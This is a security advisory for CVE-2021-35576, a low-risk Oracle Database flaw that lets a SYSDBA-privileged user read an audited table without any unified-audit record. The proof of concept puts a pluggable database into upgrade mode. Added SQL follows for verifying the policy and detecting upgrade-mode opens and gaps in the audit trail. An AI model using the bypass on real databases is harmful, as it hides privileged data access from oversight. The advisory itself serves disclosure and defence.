Oracle Unified Audit Policy Bypass Vulnerability

Published: 03 Jan 2023 00:00:00. Reported by Emad Al-Mousa. Type: zdt. Source: 0day.today. 422 views.

Oracle Unified Audit Policy bypass in Database 12c and 19c. A user with SYSDBA privilege can place the database (or a pluggable database) in upgrade mode, in which unified auditing is not enforced, and read a table covered by a custom audit policy without leaving a record in the unified audit trail.

Title: CVE-2021-35576 – Oracle database system Unified Audit Policy ByPass
Product:                   Database
Manufacturer:              Oracle
Affected Version(s):       12.1.0.2, 12.2.0.1, 19c
Tested Version(s):         19c
Risk Level:                low
Solution Status:           Fixed
Manufacturer Notification: 2021-03-17
Solution Date:             2021-10-17
Public Disclosure:         2022-06-11
CVE Reference:             CVE-2021-35576
Author of Advisory:        Emad Al-Mousa

Overview:
Oracle Database is a general purpose relational database management system (RDBMS).
Unified Auditing is the supported mechanism for capturing database audit logs. The unified audit trail collects audit information from a variety of sources. It resides in a read-only table in the AUDSYS schema in the SYSAUX tablespace, exposes this information in a uniform format through the UNIFIED_AUDIT_TRAIL data dictionary view, and is available in both single-instance and Oracle Database Real Application Clusters environments. In addition to the user SYS, users who have been granted the AUDIT_ADMIN and AUDIT_VIEWER roles can query these views. If your users only need to query the views but not create audit policies, grant them the AUDIT_VIEWER role.


*****************************************
Vulnerability Details:
The vulnerability allows a database administrator, or a system administrator with access to the database server (local OS login or remote SYSDBA authentication), to bypass a custom in-place audit policy defined in the Oracle database. Placing the database in upgrade mode (STARTUP UPGRADE) disables unified auditing, so a threat actor holding that privilege can perform malicious operations against audited objects without detection. The precondition is SYSDBA-level access: the finding is not a privilege escalation but a loss of accountability for an already privileged account, which is why the vendor rated it low.

*****************************************
Proof of Concept (PoC):
I will create a table in pluggable database PDB1 under the HR schema and insert a few records:
SQL> CREATE TABLE HR.EMPLOYEE
(
  FIRST_NAME  VARCHAR2(50),
  LAST_NAME   VARCHAR2(50)
);
SQL> INSERT INTO HR.EMPLOYEE (
   FIRST_NAME, LAST_NAME)
VALUES ( 'EMAD','MOUSA' );
SQL> commit;


SQL> INSERT INTO HR.EMPLOYEE (
   FIRST_NAME, LAST_NAME)
VALUES ( 'SAMI','MOUSA' );
SQL> commit;
I will now create an audit policy that records every SELECT against the table and enable it:
SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;
SQL> audit policy SELECT_P1;
To check the audit policies enabled in PDB1:
SQL> SELECT * FROM audit_unified_enabled_policies;

Now, let us execute the SELECT statement against the monitored/audited table while the database is in upgrade mode. Because the session container is PDB1, SHUTDOWN IMMEDIATE closes the PDB and STARTUP UPGRADE reopens only that PDB in upgrade mode; STARTUP FORCE afterwards returns it to normal READ WRITE mode:
sqlplus / as sysdba
SQL> alter session set container=PDB1;
SQL> shutdown immediate;
SQL> startup upgrade;
SQL> select * from HR.EMPLOYEE;
SQL> startup force;
SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;


Checking the audit trail with the following query, no entry is recorded in the unified audit trail for the SELECT executed in upgrade mode:

SQL> select OS_USERNAME,USERHOST,DBUSERNAME,CLIENT_PROGRAM_NAME,EVENT_TIMESTAMP,ACTION_NAME,OBJECT_SCHEMA,OBJECT_NAME,SQL_TEXT from unified_audit_trail where OBJECT_NAME='EMPLOYEE' order by EVENT_TIMESTAMP desc;
So, even though an audit policy was configured in the database, a DBA/system administrator can read the audited sensitive table without a trace: no record is populated in the UNIFIED_AUDIT_TRAIL view.
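The following SQL is an added example, not part of the original advisory. It gives a practitioner two things the PoC above leaves out: a control run that proves the SELECT_P1 policy does record the same SELECT in normal mode (so that the empty result in upgrade mode is a genuine bypass and not a misconfigured policy), and compensating detection queries for unpatched systems, since the bypass cannot be performed silently: it requires closing and reopening the PDB or instance in upgrade mode, which is visible in V$INSTANCE, V$PDBS and the alert log. It assumes the PDB1/HR.EMPLOYEE/SELECT_P1 setup from the PoC and a SYSDBA session in PDB1 run from SQL*Plus; the alert-log keyword search in step 3 assumes the alert log records the OPEN MIGRATE / OPEN UPGRADE command text and should be verified against your own release.

```sql
-- Added example (not from the advisory). Run as SYSDBA in PDB1 from SQL*Plus.
-- Assumes the SELECT_P1 policy on HR.EMPLOYEE from the PoC is enabled.

-- 1. Control case: the same SELECT in normal (READ WRITE) mode must produce an
--    audit record. If this returns no row, the policy itself is broken and the
--    upgrade-mode result proves nothing.
SELECT * FROM HR.EMPLOYEE;
EXEC SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;

SELECT event_timestamp, dbusername, action_name, object_schema, object_name,
       unified_audit_policies, return_code
  FROM unified_audit_trail
 WHERE object_schema = 'HR'
   AND object_name   = 'EMPLOYEE'
   AND unified_audit_policies LIKE '%SELECT_P1%'
 ORDER BY event_timestamp DESC;
-- Expected: one row with ACTION_NAME = 'SELECT' and
-- UNIFIED_AUDIT_POLICIES containing SELECT_P1.

-- 2. Live check: is anything currently open in upgrade mode?
--    V$INSTANCE.STATUS is 'OPEN MIGRATE' for an instance started with
--    STARTUP UPGRADE; V$PDBS.OPEN_MODE is 'MIGRATE' for a PDB opened that way.
--    Any hit outside a planned upgrade window is a finding.
SELECT instance_name, status, startup_time
  FROM v$instance
 WHERE status = 'OPEN MIGRATE';

SELECT name, open_mode, open_time
  FROM v$pdbs
 WHERE open_mode = 'MIGRATE';

-- 3. Retrospective check via the alert log (V$DIAG_ALERT_EXT). ASSUMPTION:
--    the alert log contains the OPEN MIGRATE / OPEN UPGRADE command text when
--    the database or a PDB is opened in upgrade mode; confirm the exact wording
--    on a test system by running the PoC and reading the alert log.
SELECT originating_timestamp, message_text
  FROM v$diag_alert_ext
 WHERE (UPPER(message_text) LIKE '%OPEN MIGRATE%'
     OR UPPER(message_text) LIKE '%OPEN UPGRADE%')
   AND originating_timestamp > SYSTIMESTAMP - INTERVAL '30' DAY
 ORDER BY originating_timestamp;

-- 4. Audit-trail gap around the last (re)open of the PDB. Anything a
--    privileged user did between LAST_AUDIT_BEFORE_OPEN and
--    FIRST_AUDIT_AFTER_OPEN is unaccounted for if the PDB was opened in
--    upgrade mode; correlate with step 3 and with OS-level logs of the
--    oracle account and listener.
SELECT p.name,
       p.open_time,
       (SELECT MAX(u.event_timestamp)
          FROM unified_audit_trail u
         WHERE u.event_timestamp < p.open_time)  AS last_audit_before_open,
       (SELECT MIN(u.event_timestamp)
          FROM unified_audit_trail u
         WHERE u.event_timestamp >= p.open_time) AS first_audit_after_open
  FROM v$pdbs p;
```

Step 1 is the check to run first on a patched system after applying the October 2021 CPU: repeat the PoC and confirm the row now appears. Steps 2 to 4 are compensating detections only; they do not restore the missing audit records, so the actual remediation is applying the CPU referenced below and restricting who can authenticate as SYSDBA.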
*****************************************
References:
https://www.oracle.com/security-alerts/cpuoct2021.html 
https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/
https://nvd.nist.gov/vuln/detail/CVE-2021-35576

Credit:
Emad Al-Mousa: CVE-2021-35576


Scores:
Vulners AI Score: 4.2 (medium risk)
CVSS 3.1: 2.7
CVSS 2: 4
EPSS: 0.00753